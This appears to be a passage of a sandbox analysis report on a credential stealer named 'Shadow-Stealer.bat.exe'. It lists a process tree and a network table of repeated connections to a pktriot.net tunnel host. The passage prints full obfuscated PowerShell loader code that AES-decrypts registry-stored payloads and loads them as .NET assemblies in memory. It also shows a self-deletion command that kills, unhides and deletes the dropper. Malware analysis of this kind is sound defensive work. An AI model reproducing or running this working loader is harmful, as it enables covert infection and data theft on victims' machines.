'')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{34da9efd-bc13-45a5-9d1a-5be862586030}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{be0e7d18-2e6c-4e3a-90c8-b7afba5aa508}
C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3376).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5194bba6-089c-407d-961a-c0a6163ad991}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{96c33985-81e6-4e05-9bbe-da1980776803}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{159c1918-d815-4e9a-b657-4504d0c9c6b0}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{dde74d24-75e2-4b87-92ce-3f3e0102344f}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2892 -ip 2892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 156
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7614eb74-0942-4b90-9c42-88b23fff0a53}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{bf6b6f95-deda-4803-b2a0-5aa1592b2deb}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5480 -ip 5480
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 476
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{8f615197-7f83-426f-bcb7-797e9a5d7bcc}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{ca3d5849-971f-46fa-b6ea-8e33e4c20a40}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{40d50a0c-a320-4ac2-a877-2d461bbf1d53}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ad978389-d6e9-450a-b0c6-360a9b71acf8}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{56fef73a-7b3e-41cb-9dec-bc3ea2609aac}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e33ab120-c4f4-44f4-b064-46101783cf7a}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{980745c6-a03c-4fd2-b338-9772e64035ba}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5732 -ip 5732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 476
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bf65b796-427b-4c14-8060-f7bb17b83de9}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 688 -p 5532 -ip 5532
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{22216ce1-e38d-4ceb-89da-003019ff7b6a}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5532 -s 312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6064 -ip 6064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 476
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
C:\Windows\system32\taskkill.exe
taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\attrib.exe
ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 3732 -ip 3732
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3732 -s 940
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:5050 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
| DE | 167.71.56.116:22112 | throbbing-mountain-09011.pktriot.net | tcp |
